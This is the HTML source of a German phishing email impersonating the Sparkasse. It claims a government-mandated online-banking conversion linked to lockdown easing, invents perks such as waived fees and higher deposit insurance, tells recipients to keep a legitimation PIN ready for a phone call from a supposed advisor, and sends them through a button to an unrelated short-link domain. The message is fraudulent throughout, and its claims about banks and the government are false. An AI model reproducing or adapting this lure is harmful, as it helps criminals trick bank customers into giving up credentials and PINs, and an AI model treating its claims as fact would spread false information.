<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
</head><body bgcolor="#f2f8f1">
<table align="center">
<tbody><tr>
<td height="13"></td>
</tr>
<tr>
<td>
<table style="border: 1px solid rgb(195, 194, 196); border-image: none;" cellspacing="0" cellpadding="0">
<tbody><tr>
<td width="596">
<table width="100%" bgcolor="#ea0e0b" cellspacing="0" cellpadding="0">
<tbody><tr>
<td width="15" height="25"></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>
<img src="https://i.imgur.com/q660uN3.png">
</td>
<td></td>
</tr>
<tr>
<td height="25"></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<table width="100%" bgcolor="#666569" cellspacing="0" cellpadding="0">
<tbody><tr>
<td width="15" height="17" style="border-top-color: rgb(114, 119, 117); border-top-width: 1px; border-top-style: solid;"></td>
<td style="border-top-color: rgb(114, 119, 117); border-top-width: 1px; border-top-style: solid;"></td>
</tr>
<tr>
<td></td>
<td style="color: rgb(213, 213, 213); font-family: arial; font-size: 13px; font-weight: bold;">Wichtige Mitteilung</td>
</tr>
<tr>
<td width="15" height="17" style="border-bottom-color: rgb(114, 119, 117); border-bottom-width: 1px; border-bottom-style: solid;"></td>
<td style="border-bottom-color: rgb(114, 119, 117); border-bottom-width: 1px; border-bottom-style: solid;"></td>
</tr>
</tbody></table>
<table width="100%" bgcolor="#ffffff" cellspacing="0" cellpadding="0">
<tbody><tr>
<td width="15" height="17"></td>
<td style="font-family: arial;"><p><br>
<font color="red"><b>Sehr geehrte(r) Kunde/-in,</b></font><br><br>
<span style="font-size: 12px;"><strong>

</strong>schalten Sie jetzt die Vorz&uuml;ge unseres neuen Online-Bankings der Sparkasse frei und profitieren Sie von dem neuen einheitlich abgestimmten System S.I.B.S. (Sparkasse Intelligence Banking System).</span></p><p><span style="font-size: 12px;">Die Updates treten sp&auml;testens zum 10.04.2021 in Kraft.</span></p><p><span style="font-size: 12px;">Hintergrund sind die Lockerungen im aktuell bundesweiten Lockdown.</span></p><p><span style="font-size: 12px;">
Daher werden alle Geldinstitute bundesweit von der Regierung angewiesen entsprechende Ma&szlig;nahmen zu treffen um das Infektionsgeschehen positiv zu beeinflussen.</span></p><span style="font-size: 12px;"><p><br>Allgemeine Neuerungen in der &Uuml;bersicht:<br>- Deutschlandweit kostenlos Bargeld abheben an allen Automaten</p><p>- Keine Kontogeb&uuml;hren mehr bis einschlie&szlig;lich Dezember 2022</p><p>- Kurzfristige Finanzierungshilfen</p><p>- Individuelle Hilfe in der Krisenzeit</p><p>
- Die Einlagensicherung erh&ouml;ht sich von 100.000 Euro auf 250.000 EUR</p><p>- Wichtige&nbsp; Sicherheitsupdates im Bezug auf Ihr Online-Banking</p><p>Um Fragen im Bezug auf die Umstellung oder besondere Anliegen, wird sich Ihr f&uuml;r die Umstellung zugeteilter Kundenberater k&uuml;mmern. Dieser wird sich in K&uuml;rze bei Ihnen telefonisch melden.</p><p>
Das Umstellungsverfahren ist nur zu bestimmten Zeitpunkten m&ouml;glich, da sonst die Rechenleistung unserer Server zu stark beansprucht wird, kann der Anruf auch au&szlig;erhalb regul&auml;rer Gesch&auml;ftszeiten erfolgen.</p><p>Bitte halten Sie daher unbedingt Ihre, im letzten Schritt ausgestellte, Legitimations-PIN bereit.</p><p>Diese Neuerung im Bereich des Online-Banking erfordert Ihre pers&ouml;nliche Mithilfe.</p><p>
Es handelt sich hierbei um eine verpflichtende Umstellung&nbsp; seitens der Bundesregierung, welche ebenfalls zu Ihrer Sicherheit dient.<br></p></span><p><br></p>
</td>
<td width="15" height="17"></td>
</tr>
<tr>
<td></td>
<td style="color: rgb(66, 66, 66); font-family: arial; font-size: 13px; font-weight: bold;">
<table width="100%" bgcolor="" cellspacing="0" cellpadding="0">
<tbody><tr>
<td width="15" height="17" style="border-top-color: rgb(195, 195, 199); border-top-width: 1px; border-top-style: solid;"></td>
<td style="border-top-color: rgb(195, 195, 199); border-top-width: 1px; border-top-style: solid;"></td>
</tr>
<tr>
<td></td>
<td>
<a href="https://istimanmarsch.com/3uUkm"><center>
<img style="margin-left: -20px;" src="https://i.imgur.com/32j5HsC.png">
</center>
</a>
</td>
</tr>
<tr>
<td width="15" height="17" style="border-bottom-color: rgb(195, 195, 199); border-bottom-width: 1px; border-bottom-style: solid;"></td>
<td style="border-bottom-color: rgb(195, 195, 199); border-bottom-width: 1px; border-bottom-style: solid;"></td>
</tr>
</tbody></table>
</td>
<td></td>
</tr>
<tr>
<td width="15" height="17"></td>
<td></td>
<td width="15" height="17"></td>
</tr>
</tbody></table>
<table width="100%" bgcolor="#656865" cellspacing="0" cellpadding="0">
<tbody><tr>
<td width="15" height="17"></td>
<td></td>
</tr>
<tr>
<td></td>
<td style="text-align: center; color: rgb(204, 204, 204); font-family: arial; font-size: 13px; font-weight: bold;">
Impressum&nbsp;&nbsp;<font color="#848389">|</font>&nbsp;&nbsp;Datenschutz&nbsp;&nbsp;<font color="#848389">|</font>&nbsp;&nbsp;Preise und Hinweise&nbsp;&nbsp;<font color="#848389">|</font>&nbsp;&nbsp;AGB&nbsp;&nbsp;<font color="#848389">|</font>&nbsp;&nbsp;Kontakt <br><br><br>
&#65533; 2021, Sparkassen-Finanzportal GmbH
</td>
</tr>
<tr>
<td width="15" height="17"></td>
<td></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
<td></td>
</tr>
</tbody></table>


</body></html>